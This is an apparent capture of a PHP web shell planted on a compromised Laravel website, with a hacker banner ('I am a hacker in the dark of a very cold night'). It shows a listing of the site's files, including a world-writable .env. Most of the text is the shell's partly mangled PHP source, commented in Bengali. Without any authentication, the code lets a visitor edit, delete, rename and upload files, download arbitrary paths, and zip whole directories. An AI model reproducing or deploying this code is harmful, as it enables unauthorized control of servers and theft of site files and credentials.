I am a hacker in the dark of a very cold night

path :/var/www/html/vorne.webheaydemo.com

upload file:

List of files:

name file size edit permission action
.editorconfig276 KBMarch 05 2024 07:12:340666
.env1385 KBMay 24 2024 16:43:550666
.env.example1088 KBMarch 05 2024 07:12:340666
.gitattributes190 KBMarch 05 2024 07:12:340666
.gitignore245 KBMarch 05 2024 07:12:340666
.htaccess947 KBJuly 04 2023 21:25:080664
.rnd1024 KBMarch 13 2024 04:51:140666
README.md472 KBMarch 22 2024 10:35:000666
app-March 05 2024 07:12:340777
artisan1739 KBMarch 05 2024 07:12:340666
bootstrap-March 05 2024 07:12:340777
composer.json2829 KBMay 13 2024 12:10:040666
composer.lock417205 KBMarch 19 2024 12:13:140666
config-July 03 2025 02:53:360777
database-March 05 2024 07:12:340777
index.php1816 KBMay 13 2024 10:32:360666
lang-May 13 2024 14:53:260777
manifest.json913 KBMay 14 2024 03:57:260664
package.json398 KBMarch 05 2024 07:12:340666
phpunit.xml1206 KBMarch 05 2024 07:12:340666
public-July 03 2025 02:37:200777
resources-May 13 2024 12:09:360777
routes-March 05 2024 07:12:340777
service-worker.js924 KBMarch 05 2024 07:12:340666
storage-March 05 2024 10:03:520777
symlink.php218 KBMarch 05 2024 07:12:340666
tests-March 05 2024 07:12:340777
vendor-March 19 2024 12:13:140777
vite.config.js326 KBMarch 05 2024 07:12:340666
iamH4CKEERRRRRRRRRRRS

I am a hacker in the dark of a very cold night

path :

upload file:

List of files:

'; echo '

Edit the file: ' . basename($file_to_edit) . '

'; echo ''; echo ''; echo '
'; echo ''; echo ''; } else { echo ""; } } // ফাইলের এডিট সেভ করার অংশ if (isset($_POST['save_edits'])) { $edited_content = $_POST['edited_content']; $file_to_edit = $_GET['edit']; if (file_exists($file_to_edit)) { file_put_contents($file_to_edit, $edited_content); echo ""; } else { echo ""; } } $current_dir = isset($_GET['dir']) ? $_GET['dir'] : getcwd(); // বর্তমান ডিরেক্টরি if (!is_dir($current_dir)) { $current_dir = getcwd(); // যদি ডিরেক্টরি না হয়, তবে ডিফল্ট বর্তমান ডিরেক্টরিতে রিডাইরেক্ট করা হবে } $files = scandir($current_dir); // ডিরেক্টরির সব ফাইল বের করা foreach ($files as $file) { if ($file !== '.' && $file !== '..') { $full_path = $current_dir . '/' . $file; $is_dir = is_dir($full_path); echo ""; echo ""; echo ""; echo ""; echo ""; // পারমিশন দেখায় echo ""; echo ""; } } ?>
name file size edit permission action
" . ($is_dir ? "" . $file . "" : $file) . "" . ($is_dir ? '-' : filesize($full_path) . " KB") . "" . date("F d Y H:i:s", filemtime($full_path)) . "" . substr(sprintf('%o', fileperms($full_path)), -4) . "
alert('File deleted successfully!');window.location.href='';"; } else { echo ""; } } // ফাইল রিনেম করা if (isset($_POST['rename'])) { $oldname = $_POST['oldname']; $newname = $_POST['newname']; if (file_exists($current_dir . '/' . $oldname)) { rename($current_dir . '/' . $oldname, $current_dir . '/' . $newname); echo ""; } else { echo ""; } } // ফাইল আপলোড করা if (isset($_POST['upload'])) { $target_dir = $current_dir . "/"; $target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]); if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { echo ""; } else { echo ""; } } // ফাইল ডাউনলোড করা (একটি ফাইল) if (isset($_GET['download'])) { $file_to_download = $_GET['download']; if (file_exists($file_to_download)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file_to_download) . '"'); header('Content-Length: ' . filesize($file_to_download)); readfile($file_to_download); exit; } else { echo ""; } } // সব ফাইল ডাউনলোড করা (ZIP) if (isset($_POST['download_all'])) { // ZIP ফাইলের নাম এবং অবস্থান $zip_file = 'all_files.zip'; // ZIP ক্লাস ব্যবহার করে ফাইল কম্প্রেস করা $zip = new ZipArchive(); if ($zip->open($zip_file, ZipArchive::CREATE | ZipArchive::OVERWRITE) === TRUE) { // ডিরেক্টরির ফাইলগুলো লুপ করে ZIP এ যোগ করা $files = scandir($current_dir); foreach ($files as $file) { if ($file !== '.' && $file !== '..') { $file_path = $current_dir . '/' . $file; if (is_file($file_path)) { $zip->addFile($file_path, basename($file_path)); } } } $zip->close(); // ZIP ফাইল ডাউনলোড করা header('Content-Type: application/zip'); header('Content-Disposition: attachment; filename="' . basename($zip_file) . '"'); header('Content-Length: ' . filesize($zip_file)); flush(); readfile($zip_file); // ডাউনলোড শেষে ZIP ফাইল মুছে ফেলা unlink($zip_file); exit; } else { echo ""; } } ?>